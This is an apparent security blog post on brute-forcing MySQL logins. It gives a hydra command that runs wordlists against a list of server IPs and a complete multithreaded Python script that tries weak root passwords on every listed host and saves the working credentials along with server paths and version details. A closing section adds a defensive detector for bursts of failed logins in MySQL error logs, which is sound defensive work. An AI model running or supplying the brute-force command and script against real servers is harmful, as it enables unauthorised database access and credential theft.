Brute-forcing MySQL passwords
2020-02-29
sunnnnnnnnnny
How can weak MySQL passwords be detected automatically? This post introduces two approaches.
1. hydra
hydra is a password brute-forcing tool that ships with Kali Linux.
hydra's usage help:
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [service://server[:PORT][/OPT]]
Options:
-R restore a previous aborted/crashed session
-I ignore an existing restore file (don't wait 10 seconds)
-S perform an SSL connect
-s PORT if the service is on a different default port, define it here
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS or -P FILE try password PASS, or load several passwords from FILE
-x MIN:MAX:CHARSET password bruteforce generation, type "-x -h" to get help
-y disable use of symbols in bruteforce, see above
-e nsr try "n" null password, "s" login as pass and/or "r" reversed login
-u loop around users, not passwords (effective! implied with -x)
-C FILE colon separated "login:pass" format, instead of -L/-P options
-M FILE list of servers to attack, one entry per line, ':' to specify port
-o FILE write found login/password pairs to FILE instead of stdout
-b FORMAT specify the format for the -o FILE: text(default), json, jsonv1
-f / -F exit when a login/pass pair is found (-M: -f per host, -F global)
-t TASKS run TASKS number of connects in parallel per target (default: 16)
-T TASKS run TASKS connects in parallel overall (for -M, default: 64)
-w / -W TIME wait time for a response (32) / between connects per thread (0)
-c TIME wait time per login attempt over all threads (enforces -t 1)
-4 / -6 use IPv4 (default) / IPv6 addresses (put always in [] also in -M)
-v / -V / -d verbose mode / show login+pass for each attempt / debug mode
-O use old SSL v2 and v3
-q do not print messages about connection errors
-U service module usage details
-h more command line options (COMPLETE HELP)
server the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
service the service to crack (see below for supported protocols)
OPT some service modules support additional input (-U for module help)
Supported services: adam6500 asterisk cisco cisco-enable cvs firebird ftp[s] http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] memcached mongodb mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp
Hydra is a tool to guess/crack valid login/password pairs. Licensed under AGPL
v3.0. The newest version is always available at https://github.com/vanhauser-thc/thc-hydra
Don't use in military or secret service organizations, or for illegal purposes.
These services were not compiled in: afp ncp oracle sapr3.
Use HYDRA_PROXY_HTTP or HYDRA_PROXY environment variables for a proxy setup.
E.g. % export HYDRA_PROXY=socks5://l:p@127.0.0.1:9150 (or: socks4:// connect://)
% export HYDRA_PROXY=connect_and_socks_proxylist.txt (up to 64 entries)
% export HYDRA_PROXY_HTTP=http://login:pass@proxy:8080
% export HYDRA_PROXY_HTTP=proxylist.txt (up to 64 entries)
Examples:
hydra -l user -P passlist.txt ftp://192.168.0.1
hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
hydra -l admin -p password ftp://[192.168.0.0/24]/
hydra -L logins.txt -P pws.txt -M targets.txt ssh
Commonly used wordlists are available in Kali under /usr/share/wordlists/
or see https://gitee.com/molok/Blasting_dictionary
Use the following command to brute-force MySQL, where 3306_ips.txt is the list of MySQL server IP addresses and user.txt and password.txt are the username and password wordlists. -q suppresses connection error messages, -f stops attacking a host as soon as one valid password is found for it, and -o saves the results to a file.
hydra -L user.txt -P password.txt -M 3306_ips.txt -o hack_result.txt -q -f mysql
Result
(screenshot: hydra brute-force results against the MySQL servers)
See also https://www.jianshu.com/p/4da49f179cee
2. Brute-forcing MySQL with Python
Use Python's MySQL client to connect to MySQL and try the candidate passwords.
For connecting to MySQL from Python, see https://www.liaoxuefeng.com/wiki/897692888725344/932709047411488
The code is as follows:
brute_mysql.py
#-*- coding:utf-8 -*-
# author:wlj
# time:2020/2/29 22:20
# Brute-force MySQL database passwords with Python
import mysql.connector
import threading
import queue

task_queue = queue.Queue()
# password wordlist
weak_pwd_list = ['root', '123456', '12345', 'mysql', '111111', '12345678']
# mutex controlling thread access to task_queue
threadLock = threading.Lock()


def test(ip):
    for password in weak_pwd_list:
        try:
            # connect to the database with the candidate password
            conn = mysql.connector.connect(host=ip, user='root', password=password,
                                           database='mysql', port=3306)
            cursor = conn.cursor()
            sql = 'SELECT @@global.basedir,@@global.general_log_file,@@global.version,@@global.version_compile_os,@@global.secure_file_priv;'
            cursor.execute(sql)
            basedir, general_log_file, version, version_compile_os, secure_file_priv = [str(x) for x in cursor.fetchone()]
            cursor.close()  # close the database connection
            conn.close()
            print('%s,%s,%s' % (ip, 'root', password))
            # one CSV row of 8 fields (no trailing comma)
            format_str = ','.join(['%s'] * 8) + '\n'
            # save the result to the file
            with open('mysql_weak_pwd.csv', 'a') as f:
                f.write(format_str % (ip, 'root', password, basedir, general_log_file,
                                      version, version_compile_os, secure_file_priv))
            return
        except Exception:
            # wrong password or unreachable host: try the next candidate
            continue


def brute_mysql():
    global task_queue
    while True:
        # acquire the lock for thread synchronisation
        threadLock.acquire()
        if task_queue.empty():
            threadLock.release()
            return
        ip = task_queue.get()
        threadLock.release()
        test(ip)


def main():
    with open('3306_ips.txt', 'r') as f:
        ip_list = f.read().split('\n')
    with open('mysql_weak_pwd.csv', 'w') as f:
        f.write('ip,user,password,basedir,general_log_file,version,version_compile_os,secure_file_priv\n')
    for ip in ip_list:
        ip = ip.strip()
        if ip:
            task_queue.put(ip)
    threads = []
    for i in range(0, 200):
        t = threading.Thread(target=brute_mysql)
        t.start()
        threads.append(t)
    for t in threads:
        t.join()


if __name__ == '__main__':
    main()
Result
(screenshot: Python scan results)
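Both the hydra run and the Python script above leave the same trace on the server side: a burst of "Access denied for user" entries in the MySQL error log, one per rejected password. The following detector, an added example that is not part of the original post, parses such lines and flags source hosts whose failure count within a sliding time window exceeds a threshold. The log lines are constructed samples in the 5.7/8.0 error-log style, and the script assumes the server actually writes failed logins to its error log (MySQL 5.7 does so only at log_error_verbosity=3).

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample error-log lines (not real data): a six-attempt burst
# from 10.0.0.5, one stray failure from 10.0.0.9, and one late failure.
SAMPLE_LOG = """\
2020-02-29T14:20:10.000001Z 12 [Note] Access denied for user 'root'@'10.0.0.5' (using password: YES)
2020-02-29T14:20:10.200001Z 13 [Note] Access denied for user 'root'@'10.0.0.5' (using password: YES)
2020-02-29T14:20:10.400001Z 14 [Note] Access denied for user 'root'@'10.0.0.5' (using password: YES)
2020-02-29T14:20:10.600001Z 15 [Note] Access denied for user 'root'@'10.0.0.5' (using password: YES)
2020-02-29T14:20:10.800001Z 16 [Warning] [MY-010926] [Server] Access denied for user 'root'@'10.0.0.5' (using password: YES)
2020-02-29T14:20:11.000001Z 17 [Note] Access denied for user 'root'@'10.0.0.5' (using password: YES)
2020-02-29T14:25:00.000001Z 18 [Note] Access denied for user 'app'@'10.0.0.9' (using password: YES)
2020-02-29T15:30:00.000001Z 19 [Note] Access denied for user 'root'@'10.0.0.5' (using password: NO)
"""

# Matches both the 5.7 layout ("[Note] Access denied ...") and the 8.0 layout
# with extra bracketed fields ("[Warning] [MY-010926] [Server] Access denied ...").
DENIED_RE = re.compile(
    r"^(?P<ts>\S+)Z\s+\d+\s+\[\w+\]\s+(?:\[[^\]]+\]\s+)*"
    r"Access denied for user '(?P<user>[^']*)'@'(?P<host>[^']*)'"
)


def parse_denied(log_text):
    """Yield (timestamp, user, host) for every 'Access denied' line."""
    for line in log_text.splitlines():
        m = DENIED_RE.match(line)
        if m:
            yield datetime.fromisoformat(m.group("ts")), m.group("user"), m.group("host")


def flag_sources(log_text, threshold=5, window=timedelta(seconds=60)):
    """Return {host: peak failures in any `window`} for hosts reaching `threshold`.

    A sliding window over the sorted timestamps catches a wordlist burst while
    ignoring the same host's isolated failures hours apart."""
    per_host = defaultdict(list)
    for ts, _user, host in parse_denied(log_text):
        per_host[host].append(ts)
    flagged = {}
    for host, stamps in per_host.items():
        stamps.sort()
        start, peak = 0, 0
        for end, ts in enumerate(stamps):
            while ts - stamps[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[host] = peak
    return flagged
```

Feed it the real error log (or the output of `SELECT * FROM performance_schema.host_cache`, which MySQL also keeps per source host) and alert on the returned dictionary; pairing the alert with a connection_control plugin delay blunts the burst the page's tools produce.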